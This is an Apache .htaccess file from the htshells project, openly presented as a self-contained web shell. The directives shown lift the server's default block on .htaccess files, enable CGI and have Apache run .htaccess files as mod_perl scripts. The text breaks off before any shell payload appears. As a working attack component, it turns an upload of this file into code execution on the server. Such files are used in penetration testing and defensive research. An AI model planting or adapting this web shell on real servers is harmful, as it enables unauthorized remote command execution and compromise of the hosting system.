mubix/htshells/master/mod_perl.shell.htaccess
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
Order allow,deny
Allow from all
</Files>
# Enable CGI
Options +ExecCGI
# Make apache treat .htaccess files as mod_perl scripts
AddHandler perl-script .htaccess
Files
